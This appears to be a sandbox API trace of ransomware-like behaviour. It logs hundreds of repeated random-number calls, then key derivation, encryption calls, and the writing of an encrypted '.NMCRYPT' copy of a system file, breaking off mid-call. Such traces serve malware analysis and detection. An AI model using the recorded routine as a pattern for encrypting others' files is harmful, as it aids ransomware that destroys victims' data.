CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.675] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.676] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.676] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.677] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0148.677] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.677] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad778) returned 1 [0148.677] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.677] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.677] wcslen (_String="\\\\?\\") returned 0x4 [0148.677] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7b8) returned 1 [0148.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.678] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=46622) returned 1 [0148.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, 